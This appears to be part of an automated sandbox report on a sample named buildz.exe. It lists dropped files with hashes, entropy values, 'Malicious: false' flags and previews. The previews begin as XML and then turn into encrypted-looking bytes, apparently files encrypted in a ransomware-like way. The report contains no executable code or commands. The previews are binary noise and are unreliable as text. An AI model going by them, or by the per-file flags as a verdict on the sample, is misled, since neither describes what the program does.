                        Preview:<?xml...a....}%..`...iNta....~..J....l.h.P..e....."........!.....l...;.6>..m..#T....E.i1sy..bD...~.(....].5.. [...c.(.g.=~._.J..n......\z..@ ..:A..L.<....d...Rn..v<k..|9).....$..c...%`..7.w...X.S.{c-F..$!3.Dnq..$.4...;.-..L...w.....c.....X....L|H.8 ....Q/_.. =..../.....\.#.B.m3B2K..l&.l).......0..#......Dm..M...d..E.~.....#}..(.......V......+(..!.....p...BLg.82.d..w.H.x.........W.M..QD...n4I-../.!k...n.S...$.U3..-.E_c...O|[....+.YX......xg..........X=...!.ISd...d....7n{..)@8.95.;I......-.X......\L.,....LU.-R?4MS(.B.@cL.}..x.G.....5Ip.iS..f...\>&./.kL...7D.G.....l.w.b..[.k0]V...&..@.Zb.+%....RV..hD..^.0n.......|..18.Z4..rY..S......u..y...GI...>).......]..d.L)..V.#K\.6N..__..O..R..F`..1...\.....{[..C.by..t......F......L6...vm..:+VV...|..H.ll...4...4L../R...".uW....F..5.L....C..:.pKr?K.V..90Q...o.b..I...z,....*.....-?.Oz..Y~.Ou*.;.g[..iS.99%........b.@.e....D...tA..M.C...{R....rS.4.*..w.ua.."...r...GJ"....6%....q=dH'.E.."1.|....j..]q.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1713
                        Entropy (8bit):7.88492703739487
                        Encrypted:false
                        SSDEEP:48:QBOcrdzuL4ZfvM86qO/z9Ppl0yAWskp25saVhnwZyHUD:Xudz/Z9j2bHUj5safdA
                        MD5:F35C704AC53ACD4E026A97D62ED68402
                        SHA1:D8B3B3877B9CBED039B39BFB07FBBB1F70FB3FE4
                        SHA-256:37FDB41D2CFB4DC20DCE0531FBE0426319E04431DBB9C5B32DBBB5FF43EDCAD4
                        SHA-512:ECD73189AF3077DDFE008702439D1D4ABF54ACB93A99D018C1FF97ECC23AEA90FD908E4EE141E317F669DA4A1DBEB3CDA05E4D3F30C1F6D30590CACCF3F25A17
                        Malicious:false
                        Preview:<?xml~.;.C..P.F.Q...5_.....K..O3.g..#.V...$!p..<.yi.gl.o4..O+.6.|.;....`.......9.._..../n.~I.s2.|4.m...........r....m.t......j..H.......|..U>..FvZy.Y......W...Y>.^.#...z.Y..w..Q,;E..&V.y.........0.....@...1Kf)O..........."?j.......C90.m..wj}.a..........p:..n.h.Q..Q"..]1G..Z.o.....V.1..F..-.1..C...x....`..mZO.M}Rc3.7a..._]...l...)k...l.P.W....4..{.).IXJ...dg[...^.O..k~.,V?Z.Dx1...nR%......T..)...*.I.v.$..1^$.A.`aH..x.../...s.k....Bs.......<...o~w?.7...6;.b.9.2...{.....3...q..sf..C].+S...3M..PBs....%3......eZ.....W~.i..'l.v..s..0j2....[{...4.JdO.jv....T....=.....M-\..{..#.0.....,v%W....../`0..........buX......2o......|+..\R](0..q...i.z.X...E.2..Z...[%/...G.K..|.|..3...{.w.,..xv1..<.uL..$.......A.C...LO?.+.>.....q.<H.RY.V...|Qe]Q......S...,A[.J..{......l...i.%d..@...&i...3....vA.\...M..}J.v.?........_~...4.6J.X...O.......8[....u.qL...w."....o...:...F..m.R..yML...ri.m..a.(.:..:..../.vr$.Z4.........n..cxh...LM...i.>N!...8W...O...G.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1750
                        Entropy (8bit):7.883265796488769
                        Encrypted:false
                        SSDEEP:48:ZDwtEFYQSAXcYmTW57uJfTGkxJs+ZG74gbdXnCnbkUD:RTYwXRmiQV9QFblnCngA
                        MD5:C1C40CEC97822D67EB4AEB42B96A9E01
                        SHA1:853529E2FD424FC7AD73ADDECE01D53CCA3BB9D8
                        SHA-256:98C2A151D4017F0B4208ADBE0ABB02AD049DFBA8F75877D9D0B511CE2734F6FE
                        SHA-512:F17F7CC97746185BB36469B370578AF446B595004A8F4D5A17914928CF175F662FF5D0B616E51417EB92D92C6C48FC16D931C2549530B9EB007584DF984B0099
                        Malicious:false
                        Preview:<?xml.....>..B.....$i0p?.6.O.h]~'.......QG.$....4..Jt...k./..8@..$.d-.........H(.]......K2..U...o..|.nE..#.)z.....G%..Y...........^d.gh.Q.(8*..<{m.a.....f..r...n.p]...J.4...8@RH.I.SQcv]hEG.......w:..%..5..j.....T.j$.v9.[.&hks....~..Ra=zS.9C.db...`...8...M;....d.s....u.]..%..T..T.2.....\...u>.a...+..3\3..A......8ld..EC.j..\.K..\.{..._..J..(Sg...tgr.\>.n....0..x....\a*.#._.j.wy..0".Rg..9~.).X.|B{p...wy.eUh..|..5 9./.........B.....'..{)%...tL.r}....p3.....s....I....r.v.`$.....i...Pa.-.u.P.[V.,.(.[...EF..S..........n.;..dS..g.Z..."r.5...Go97..H...T`.|....e.....[.4...+.@.`..S.A.j...g...I:}["A. ... .ys.w.+.Fe.(4..'vKV.J...M\.....W.'E...C....."..~.)...#.....-.c^.......2...C..*..- .a.3.+........=2..I....._..J'Y.zu........O..)..J."...]...I.. .W.yi..S..5.i... K[OL...n-...=..W...S.r..0....4sZ.=Y..A...w).0..n.GX<{U#t4....Ca.We...^..wk53\../:.....Cub]s....a..X..)..........I<F....!.^....e..%e]..0...-_...vF..aL2...#i....3......T[O..mK.bT.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1583
                        Entropy (8bit):7.878278783351727
                        Encrypted:false
                        SSDEEP:24:AHpG+jtoE/3c/ywhBi2H4/MfEBtoyuonUl/g2rAKeN80RL2UMmdc8XyXzcqGbD:AH/HknqMf0mfQLNMm7XyXzcqUD
                        MD5:89DD5AED04D05C2CF568E1AD0F22F8BF
                        SHA1:65BB78B3922F34198752A7B944F486FB3F6CFA5F
                        SHA-256:F4B995A50E7D074BBC742C8870E9B80DF614225B9977FEDA9A8F55EBECF7F2F9
                        SHA-512:2F88E0EDC6951BF24864C50045858D688C8F725638AACAD7D9A362C1E8E3C95B171057DECCE2199BA70CB34BC61D0F6D0BE845F2014D3488CC97F60656C908F0
                        Malicious:false
                        Preview:<?xml=..M...K........v.C^.....\.F$1..T..Vhl^K..[1.UH.;.%5..~.A#$=."...dJ.>.0.G......mR...]....I.Q...j.M....[. .......W/.%8..x..Mq...m........ ._){..A1..".~<.8...-.|.p.p...e.....v(.h..=..........VIv.....V...j....&.Ryy.....@.I....c/.u=j........%....oH.....$P.+...........^B...<....a....u6.)YH......F.ob...4....o..~.H.y'Z._{...L..~1.:8.m.....Y.nb..-......4...Kc..i..S.*..e..L....e.v?.P^....C0B......W.;.+.3.jE.>...>c.q..n...4.J...)....q]A\.?ZG.|...YH....J..4..........E..3.D+}&..k.E.`.W.M....4o.^..)...DzDZ.~..`....1V....Qt.^#...."..P...GM....&n.4...../.... ..3.{yGxQ..\+.....e..K..>.7Rr.<...(.%D..R..*i...C0n/.*..3.H...H..'I..x.......*k.@.)._...t....F.%........]hm.H.PrFA..Am$..EmS..=..n.!d...q....v.."=..s...R...`...9......2.).......t,b".....#c..m3-B...d3g._1.C....$.%<.N..G}.I...R-...u...L26.ms..z.....F..J<....r.t...(..9NZ=..$....c.......w.O...7.....AS.j:D.(.6.CDA.........R=e...\..0\.?.:dl..K,WE....C.Q.28S.E....R.K....,.t.(.. '..............
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):361051
                        Entropy (8bit):6.5143197290241615
                        Encrypted:false
                        SSDEEP:3072:1XGTDDxAAx6MMIwKUgm6w6+6biq5HbY3wvUCbl4LSbM/QRmfsxA:1QD6AfMfpPq57K6hQmm
                        MD5:24971832E45E4753F5D672CFFB4AA58C
                        SHA1:0F8CEACF97A8EE142849AEEC9E2B20A8F5B34E4F
                        SHA-256:D17BFD1AAC3A04928830C93D6FEA96163E3B7562C5D8CF50740C57C1E622BF0D
                        SHA-512:A0782ECF97C52F4C54C3B8C36E964299D6B5ED0D05FBA04CDBC90627AAE25EF0E4CBBFE37F929CA20814370DCBA6AA8BA2312EA74FD0CFD08D98D20285970FA0
                        Malicious:false
                        Preview:<RuleG.2...J?.S.3E-..vqM......c.R..\!.;....J.+.f..Y.n........X+...n..W.....{.5....,.a...Fqn......B9kQ...~...B9h.f...X.,..ql...v|.6|.J..z..U..H.SK.......cP^..[.%b.Ch#....u(b]M..2....,e.[...f....w0..z.@..K..{8.K.e..[.;.zTl...x..y.Y9m...e...W...l...g..>.uZ..._'22..(.d.>9...Z......f...9..ED.T...fV.eQi.9.k....q..B!.u.u.c.C.@Y.l.R_....q.f.j.^Q.`....;P..?....F.z.{.^X....#...V@9Z".v!A%~....p.4..i.}..5.kJ.dA....J.3.e:..ih1{.F...@..R..%d..1..[...Nx....R,...I.N.[.q.M].....KN.pH. .%..a....0T.%...wOscZ X.j.......~9.Z..p...f........{Ie+....^n.....}Mn..P._{....9.2..W?....e.../.....C........aR=...{..Q]..L.o.wt.I7...3.`^..W....2..|..:6.U......h[...4.a}....R.E..+4}<. <..R...K2..)....z.d5,.R}u..E!.......D...uh...2..H."...`..|.q.IZP.=..../..(.e.5%..JZ..\.h3q.tym...@.#l.!.Ee.#n.@.U.G.kf. ......a.. ..}.-2T^6-..t....Wsp..H.D...1...b....X...}.p4...zp2.N..u.....g....S.,..3z{J!.......g.K......$.#3....1..>#...~A[ H..;..._..A.0...B.LuZ...}..h.F..S.t..x..e$...g.a..WT.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1928
                        Entropy (8bit):7.892412252752253
                        Encrypted:false
                        SSDEEP:48:f8/NA4rBVFubGoOqHr/CAtjwp6U5vc4Hmef1ySzc+UD:fmNrWGo9Hr/CAtjwp6UYenA
                        MD5:A0CCF98629A5D4A2410532665140F71A
                        SHA1:837928BE5F900577D83EE04EB57A9BA9E303F0C8
                        SHA-256:0E5A19098CAE3990504776D0EBD3659B86B3600415E113D52590F37C8B74E4FB
                        SHA-512:C7CB4E95013EA0DC7C0AADA88E0F3B161584F1197A5B383D61FC3662CF25A420B0C02EB3365896D2B7141A106CB2543ED70AFE7809939DC9565BAF7072DFDD4E
                        Malicious:false
                        Preview:<?xmlV....Y.=Q(..b)...=g..Z.t...*..X.....}A.A."r.Q>a..l.zO.p<C......d..~...>y.A:Y.....B...G...8L.S.bVT..]W.....A..9...h.3n...`X..>L.xa.../}.....Q..+.~......EdL.}..Xw...;y.L........s2.f.S.9....y.b.....JL.PZ`...Z..\........%.O..T...wr]...x:\l.h..=G}!.vN|nl.N5X.+.XjK&..w~.c).+..A`#P.....#&{.aU..nE..vD.l..,O*U_.7[s=..d.9D0...@.3.`.$B..4^W..U....U.W..>.....f.....vw.......8/Q#.Jb....9J\wO.....<..n..5......./Xu....FE..f*.{..<.M:e2#}....B5......H...KN2...j.......Y9....Dy.....n....[D+......B....c/RA.....+V......F^5Y.....Ot..o..+b...t..u.G.U..`..8G./n.k...O".."e.$..q..,....i..........d.%..p..ZE...N.... ...o+.f.=t5....Q.....y0;..hp.5.kd.....i....r..B.l..'1a.i......}....!...V....Y.wd..J..prN..%$..y..mB-@>m'....H.b..>.C..T..4S.x.Cu.V.2.....]l.s...SLg...q...1.m..e.|.,.3...x8...O...Q>..rK.....qJ.M...Z .q".V4..6..LzX.."....~-d.]_...y...u.k.?.H......A..'.wr...@/V.o.cj..R{....M....Z..p..:2I........`....=y.7.u...%....&S!...TV..gI."...)...R..E.O*..".F.?.,
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1387
                        Entropy (8bit):7.846591164966136
                        Encrypted:false
                        SSDEEP:24:sTaYplrxUt1uALIKBX4VFCfHrybOemD45gMUUv4wHcT443XpjxuWkXGVj/BXoIMv:srptaDLLdL0OedgMUDu/kXDEGVDtMYMz
                        MD5:532EA0A177D8A190BFDAF4DDF97DB45C
                        SHA1:DB7A95A4C7532104A5D6E6839D1CC04903552F3D
                        SHA-256:76C94F7915B3EE390079B2D811D18D3A8B1D67F61D4EB7D1104D948627A036A6
                        SHA-512:FEACF27289B274F3EA42A8389707AE8D8DB8845091838B20E0A6C63068CC96B93882C798228C78B1249CB8CF87EF7D856F43AC7C3AF76EE1273F3DAC11D6BD6A
                        Malicious:false
                        Preview:<?xml...+.6...,t%..0.........'78..:.......".%m@..4oZ...p]2w.B.LTt/.}v6..&7..(..mUFb..F......f^.).T*.....lV>]Kfv....D.....o....z.....8_..I.F.,w......E.x...-1..3.k.>q.....s.5E...H~......M)>.D1)...Y.Bkm.z.k.....j..0.n.l..p%..:.......m+...Z.).dw.$...W.....e...=......O.@........!.U....%.....l.X.0_....5...m&.4.....K.....0E.>U..Is.....L...;3n(.D...|.G.\0A%....w....s%*..Lo.z..B.c..,.8.....YG.rH_....t&...!D/.0@.,.@[1..s".k`e..O.....k....?yg.3*-..2.w..hL....O.3.?.....1$.L"@w9Y.y....x.$..1.Qk..)...$.:...<.z..,Y..ky.N\.....].]..../.X.']..Q..q..F.f..).. .Z\....u.....=).d3D....%.#P..D.."...,.Y.x.V.HVHJv43.v...0.$.d~U.KrfA..z.t....~... <.#t.....x..5yz%.....|V..?.V.j)S...=o...D.O.G..{n.....tN.D..4N3......q.MS6.....=..... ?(.o.c..........:..............-l.o$d.+...S..[7L.OR..........T.z...I.cSmh[.G..CIL..4....n..vt...y....2..4...@...(W....Q....9..'..;..c4(iC...zx......y}P.9V..W......}.W)<.sx..X:...c.8.v..Y.}9....&g}....8.B...]..&.Y......C.f.j...c\}.S.=
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3024
                        Entropy (8bit):7.939611228921159
                        Encrypted:false
                        SSDEEP:48:pAa3tK12rbZXSbNdi8VV977FUwu01aSytlyyUxj7QsfGizpDdCqx72a0xPlny6+d:py2rGJVV9XFUr0lytYyUFEeVJka0xPlM
                        MD5:5CB8251CB7F48B35C8C4C322A2523ACE
                        SHA1:FC5421F94F6AA8DC63AF4B9BCAB967AEF3D8E92E
                        SHA-256:40C2B4A11695CA27856391642E0E57ED0EA921A1A1A5554CFF5F076161BE1978
                        SHA-512:9C8C0A2F1619261DB05BB7829A30BC853BF26BBC8EE36B13CB1EFD8F625BE7C733A8E79502157171E87D9552B218A01E6D58C98F7178A5EBE763399ACF973875
                        Malicious:false
                        Preview:<?xml...oD..n.%...xIY.%.a.)...F..0...".N#?.....{+...J.Z..m|.#<zj.+.H.........s."..S.,Y...8...S.-......A...~...k...aZM%p.V.0...LE).B.fb..}$..!..VS.-a.X.A....)..#.?.......ul(.........9.YA....a5.T.c....0........^<.c;..tLv.Zg.....#...6iL|...>.Z.j..u.y.N....@......],]b...=.N..l..`7y...v..v.r.To....?.KwK!k.W<.o...OW..VK.....s...5.q#.:1..%|..q.tBd.....N...X<..:&`.Bn......Wn.....m..<.v+?,..ju..S..!7..,...rW.;....^..Q.v...+.A19>S..`........2...V.z,P.i.(.........x6...g...m....T..<...3.........c..'........DD..."\.0U.B._P...p..R..[.w..4.A..(.=..Y..../M.... ..?..5...E#;B.no...$....5......J..n.A..',M0..Z......;a......64.^}[....O..t..H.)....l-...L...k..e...H..;.....C.o.[.....Y.<..G/@.4X.....5.xh...8${W.!jB..}.^..!..1...L...."R.e..io...... .W..=m..h.V.....i..9...5**..8./....|._.K.A.#..9.O.N..z.5[.....Z]v.f:....M..f....;..0.[1.b....Qr...g.k?....H.O.O...._....s.8o..a$...A)....c.....%..Z$..L.V.......c..i?.;%.g.P...#..............;............Y
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1675
                        Entropy (8bit):7.869569251615221
                        Encrypted:false
                        SSDEEP:48:fCt3oR2R1aT2C4AkXyg3y7KncBNOC2LmPRLUD:faYR2R1aif3I+mdA
                        MD5:2C5061849F1B006ED8B2FC17AF2B0016
                        SHA1:3D21DF56F7D7C445812F3AC38C1320596D2E0E13
                        SHA-256:7E870E968AA93DA84D873054BB9BD8396EE253AAA635593F4561A2D815B23B5A
                        SHA-512:26EF160800DFE34A66B9A14B205F8A11C5439B6461C4EDC1D31FEC6E56723C47D62A9C1B17C5881688EE8ADFC71B05E4786F53F61FE92A6429E8F70BCB22D969
                        Malicious:false
                        Preview:<?xmlD...71...!X....Z.2.....4.R]..$J.C#.......u...2..2.....j.s/...Qw.O.V7.VccM.[6F.x...>.A.....r.:..r.....q|.UQW....H^.......t.0...q--..CdI-.%.*.p.}...:k..>.W...b..D..P.C..`..|u.B8'..N.[.d... m.O}...4{..@..]xWq..8^<Q..D.4.6.V.8B.........X........`.iI..ZJ...g..f.?...p..g.4.x...<....qF..D.r.MK...g.,.t\Y.m.%....~...8)R..N.qV.B..:.tm.@$.K.Y...k.............."...D?u..N?...[...x.Is\.Y..&4...q.o.....5.. ..w(9.7[..........w.P.....P#.E...i.z.E..Nl.....`...&...y=7=..=.Y.A..m.N.,..2a2.Q=~....7...m..79.v.g@.YP.}k.,L.4. ...%..]j..0.Z.E;F..7...^\....P.W`oN..x..s.QW..\.(...@s..DUO.Us`.i_...m.8..Ja.i.....R.V .s.*.L..g.J....%....).p+.L/..UvOD+R.^..L.m..b.T ..%.sR..=Y......s.e.w.a...H..u7.Y.,x...L.^..#..O_..5..ho.q.....L...*p............Q...H.m.=.V`.Y>./|.s.7.Dhl..)..l.'O.%...w../..:.@tZ......D.nM`c.c.d9.H...1 ...D....tT^)}.5.`m.........[....<%%!.z.1..;....NY:Z...S....t.sD.-r@`tt~............?.....<.N......)...(w....(.p.R...^c..P]..Pw.\..R.b2gI.vg52z$.%
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2113
                        Entropy (8bit):7.905171670443366
                        Encrypted:false
                        SSDEEP:48:twENCMde9GnhNLNV3PHb5QNUR9DaPVVVk13AY2VPJUK3QB47aQTv94fUD:ioNoUnhNLrFQG9Q4vKI4+Qj98A
                        MD5:FD017ACA7D74270C8E78CF8C160C5FDC
                        SHA1:C3E1C84EC80721F7A474F541CE2D58AD2373054B
                        SHA-256:F6F21F6F8E929C74D22B8CF704460504622490D5F7A89759A443EAA9DB91F006
                        SHA-512:50B42954F20B51C20B1AEE0DC1262C9CD973622039FADF605C3C470D594D193487A9C752DC5480F02E1CAB70509E6CA45894C299A44C8F44396AB5411C179C09
                        Malicious:false
                        Preview:<?xml.c.c..QB...:.?......^*.......o.G.p.B....<I.w........."...'.^Z#......Y...;.f...'.....6.~.+..z./<.l=U...W.L.].:....T...h..Ma..+B.C.ve....U7;..7..P.......M.<Z...j..(.?.....4a&i..`h&....<..6N...Wk[..O..p..J..i)!%.H6[.\....p.... Y..........*....(..o+/^......^I...JjM...X<.z.(..\....*k.._.\(..q.....hH.q..51.P..LNp..al....W..5....}K(.E.....#3i..,..w..U.i.UF.@].>.Xo.2uLJ-gO..3R..\...f..v:.}/v....s...K..O.7.W.;.S.0..N.B..........6R..-T*a...>...+N...H.Kv...M.$].....3._..\.=..l.S.U.e....F..Jt..e....Sp.2...&...=0........A.D6.C..Xw.M...s%.......Cdr..e\...`..r,...OR.....t...;.N...[..7y -........%..,5.|..9.g.<_...R.b.>..2.`.-fD..].)R.....\.HB...}...VD5MFS..,.....e..Z....y..S.....N1t..Z....6..0...r..m...... .^..V...s7....v5.>(=3pV..g...t./q..... I.@..xI.Q].4.0a...._..'a*... .R..{....D..s..^..;=..f...v<.g.g..$.1. .ge-.r.6c.ip..#Fu.}J,...F..[.e.....aR...-.K....lDX*o`....%.9.$....F v...Co.j.....H/w.%tD`g.T....4V..%%.....Ext{.T.%P..l.G.!..8le.Jen..-.Z..U
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):813
                        Entropy (8bit):7.734259420153913
                        Encrypted:false
                        SSDEEP:24:qZiLOy2VcTknhg48FDAUIC1ENHEFC8XGbD:7OhsYN8F0VC1ENiC8XUD
                        MD5:F6888B6D4CC4ED36DFC86DB00972E8AB
                        SHA1:30F671BD0D6046C73E72D7A368E645E976842EB0
                        SHA-256:A671330722E4E1FFA056DAB0ADE55BC8362D4DFED6800C195647F86B9F93AFEE
                        SHA-512:79ECA1AD5D642CA5CBB873C17BEDD24030E6469705C8D484FF3A1089A88510E64BA4D9259861CABC0EA9C46D7A40544A464BD90147F038DF563610B4C98B94A9
                        Malicious:false
                        Preview:<?xml*r.4..oC.:../. n...S..m.1\...o........h.j..B$..}.Qp..#..Y....b0.r...Nd./ .....Q9+-q.[6n.U.].v...G..hK^..S...(.L[.[..~1.K....S.1p...Z.Ho!..sU./...P<P.?.a..=9.\7.B....w. z3..F.^.......C.~.....l;...T5..J."......._4d..C.H(1.b..Dr1?^${.!...j..4..z..#S.x+...X.M.......mc^.xC.oC|.yh....0.Pc?q..@...l..~..^{>9?........G....B...?.......c{A..8........cJ..~Q.kj.d..........9...2....~wQg<.Q.4n.A.v......+......v....[..a...TR+...N.,.jrR.>~.G.....M..'.q...%,H.X.b....vh.%n}...$0..X....WUB..,.....)..[..g.v.y...|.*..?..y..'....R\......3.*@..n.F1KD.@..$...........u.S...ED)..[ k9..O...p.o..`....nI.P&.ooV..{.q.......}?.4.0.0.HZ.T.*.Y..H.k....../...5.zU"....li...W../...a..2.)..Y..7W.8...4.`.C...g...~...)].^......=EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2070
                        Entropy (8bit):7.885744051423823
                        Encrypted:false
                        SSDEEP:48:tm77oqTLo/rvCAx929/blh617BnuQlH1kpiwsgPamzoHpDBEbLa+8XUD:to7oqXozvN929j6HApiLgPamzoJDBM+w
                        MD5:002DCF651ECC55D26937DF815FA42EBA
                        SHA1:F4547C8013EB4567BBE874E3A4B839B7AAE10F88
                        SHA-256:DAB26BE1B7C3CECEBB1BC33E026F08761C3C601A0CBFE7BB7D29CED81763E098
                        SHA-512:06E2C531C312225CC0222B1F8622158A02FEAAC91F7611BE6CDF61A5B60A63A7356384D72C0720D3D2EE827B94D4F087078984BF9072B381EF80EA1F454EF115
                        Malicious:false
                        Preview:<?xml.gD.5+y.../....(.r.2.].-y..y0.9.#=.Y.^./...q2..~Ze..s..8)..X.(.dd.}.(.8$.V......<..;...C..S..R.bC.lB/x..9.....h)... ....5....D.&{I#!...CK........."R ,..B..o..)....RqWd.!..D2../.5........7.v.-.o..&q.t9j.x...t........&...eiy.....,..|s?......\.....A.i..d..2.RM.Hn....u....\.....l,..g..k8.w]23..:m..*..n.>..5...L..n.....E....x(!..b....=... ...uj*.Xv.....u........a..<6..#...r.!...K.....^.....I #.h........&S..............u..u.J...L.....C@S...L............F.....BX..........!......`W<u...>~.d.X.?..(S...FD.$....jeHQZg..d.1....S.....I....*%\.6K/.p;o...b...&.....&T.f.....ol..B.`L?.(.Pk..@3.r.XS4.>b<..1.."...........7.zy.gh..U_'.......1.W.....}..OZ..r..L....>...#...^..0..-.\.B...3...^..N[....1P .C`.~.}.!t../.*..h._g... @l#..I....Me......S..g<0...E...0 q.....@....Hdo.tm..K6.."`..|[...}s..}]......].NN..2...m%.t.}P..gw.f.......7I.3..}...b.n@...wPO!.\d.py..1..,pY.P..{_.g.l.H.....\bI..^,.-./....&a....sn..;...5..a}.d.....XJE.B..:9.6.. .".d..=d...x@K.Q...5
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):789
                        Entropy (8bit):7.698218404147503
                        Encrypted:false
                        SSDEEP:24:Z13HtO2FIe8UtzVYMjdYMGaWQmhfyPWBAKQYGMyGbD:Z1XtOICUfYMjdYMVmhDFiUD
                        MD5:CA8E2BB5F849B4C0F70E3D6AD0F4313F
                        SHA1:F71DCC2A6BB31754B51CA8425C295F964CDA4F88
                        SHA-256:CCDD65518FCD2750BA648B6498C3197753F9CF7E11DC4782B9CA5F572CCD1604
                        SHA-512:67D056BAC5CB3EA4CE9631AC9871D1D3A77EFB8150B30DBD278EA6A2388DD5BD0C0F45C7748846D93E817B6A47851035BC56944DCC96000AF4ADF23BFC13E021
                        Malicious:false
                        Preview:<?xml~h.. .sN.0e..)......D.(V...p..4.C.Ir...vw..F.B.iJI..g.hc......_.,.......V...to.N{.:V.A/4..Q..`f..;.[.u.L..~..1.Y9.R3Y.K...*.......!... ....a.q.^..s.5..RFq.r..J.,...bD+$....E...G.h+K>8..........k........d&.U...O}n.a..m.E.C.?0...G.9...nS...N....-J../:....H...^.wz-...(..7...fA.y9..".-q."b..v.E..I...t..P{Z}0A.<L...`.Q....1oa?...R.....(X..:....LN...CY......)+../...5.V.........S.............<"^j.Q.O/{..[P.Q..<.3$..9..l@| :..8F..u..I..._..F$.E.{S?~......si.~...s?..r.*Z.3.]o..oI.A_..4x`":. .2$I..jA:.Fz..>.^K.p.Q{XYd.[..B.Vj.d|g]..[..h...-;r.ei....T...m.tr...B.. QK..a.cw}...1`"'U&vt..6-l....p....j..^IJ..DY.BS.......PZ6...f_..V..G.6g......J.s..G....>*.cj.rA?....Vb.E4hf..P'..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3017
                        Entropy (8bit):7.933053727369608
                        Encrypted:false
                        SSDEEP:48:qOmLOcHWdDuNvRCiY4p5ULjcvMx4fr2BLRaBiq3Cnx+wcNczvg+9uGZ/DRY+OQQC:YOcHWJkpYxdxGr8Lgx++w8n+LZ/FYzIr
                        MD5:E1EB8A679DE0086DBAC0C766EB8E01B8
                        SHA1:291048BC73E1BC60396AD74A2F0239B93F034676
                        SHA-256:82704F2F1A858A6BA6C7E399279F8808120A3419BF48DC83CD2D7FED01A54CA5
                        SHA-512:7613871F8C7CED2B7F5538441F7224166471DD7D1873A2A8CAA8793F0D2F5A7AA8A41E5BBE346DE554392C5CF4931057039424073BF9B448966950300CE670B1
                        Malicious:false
                        Preview:<?xml^I.a."p.;F.s.#..x\'i.K.8...:..%'.;6U>hH6,.Z..^...D.Nm.....|8&.....=-...y.1-......(t/.m.k.S....K.z+C3H.....(..8W......f.glx......p._...9.[..#..".=V.G..@".@.$..V......d..8[......e.=........b..j..v.d........}(..9C..a.E].4..iJ;....EA.2..s.AZ.v.ry7.....}..d^w).Q|.F?...|......Zlz......7.G0...^...7*J.y....AK.J...._l2u4.p...2/..FJH[.........a(.....N......8..*...S.1\Jz....}.6....6....BX.,. ${..#.4.<L.p.M..].VyL..U...1....B..i6.....X..O..c=-(.....3..#..d....a.|.j.hF.Et.*....W^."..r.8..z..T.^...~....>.8..........n.{.bu...)z..<..u..4...a((..E.q...}.~....~1..7......f..5.|..Ug.}..N.{.i..k.#...x.5...i..9-}.u.[...:.e?6....p._.3.........l.....Z..T..S..@..7K...C.....~,...Go....y...]E|Cpl.d..nB?.._.Ox.!TC....S....O...R..[.>.L.w7^......z....^.=<.\...ih.:.IF.J%..>B.a..@j'G.....G.l].2l+.,Q.....Pz^at..q.=6O{..Qv.`M.C...* ...[..C.........>../[mw.{..:.wef..b.....H..F....I....7D.sS....$./{0....JN8..bO.(..Z.)]M......L@.}.!6_...v.f...Tl....i.#O...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3017
                        Entropy (8bit):7.937698282583013
                        Encrypted:false
                        SSDEEP:48:65b0SVef9x7umerYnP+u7PsCGFgSTPOMHzGuEH4FATl9VsE+tHYUotKUD:61LVeP7umBP+u7PsCGrTPlzGuEH4FAJb
                        MD5:A97D188AFF35D571CDFCA3A1E71E8FBB
                        SHA1:7D84DEAA966D4F02B6EEF08F4CC33758C2F38F7C
                        SHA-256:4D8A20A6D17130D588F73A93C1FA15B0F83F93ED8BB115927A924EECFB6D61DC
                        SHA-512:174CCA19F3CB5DAD47F4C49A8ED1B70F1805136F1B8DBEDB5885C8E480EE6EBF7C8BA8E51128B0B228360A15C485F6A7CE28268FC2300A15F8DB350DDE1299A8
                        Malicious:false
                        Preview:<?xml...:.-E.e..<b.@.n..[s.E....#.h..?....Cz`.8...`.G...d..G....F.\..w......g.x......UO.cjy_.g..f.:)1.j2j.B[...#..r.."5.....V%.n(2.X..Ba.....[..:q.w....=.2R<.....[..0....u.>..*p~'..~...m~..\.h..B(.bv.UA...5/..;.6G.E.%&.&.,.oa..&.................H.{.6.en.@.....9&.R.,...%.+._1~... ...I.....aU9.q..F..U.I..:<.@].~..)..s..2~Z..d.|v...@...>0...4.z.=W..;.H.M...8H.....Bm..`...f.l9.&.......h..|....W..3t.7M.9g........Z..s.......V..[.[......:Q.$....0.....tR..S...7),....c...N.Az?...rGu.s..U.......U....F.pE.vaj..'..6.....%...wY...R..K.w.AF.L1e...l..x7..B....cZ........73.T..-.S...JhQU{.U..i...@.V......Q......5...O............w...Z.O.^ugWR..?......G.z.(...B.d.l......_.DuFNs..r>..F...>..X........<.h3..T.._...w..y.ZLA`.....p%..*..0m.C.W|..'n...+...8Z=.b[VM......,..h.pc.KPuc..Y!....0...|.Q<...4.m.)..p@N.a..f ..j.:#oua.-.|.'Y..1ArL#.q.*.F ........Er...g.^Z.W.}.U..g.R.x.B...l|.l}e6ZH).3['..._.9..u.......c..8..1..B...................Q....PU..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4639
                        Entropy (8bit):7.958990639262578
                        Encrypted:false
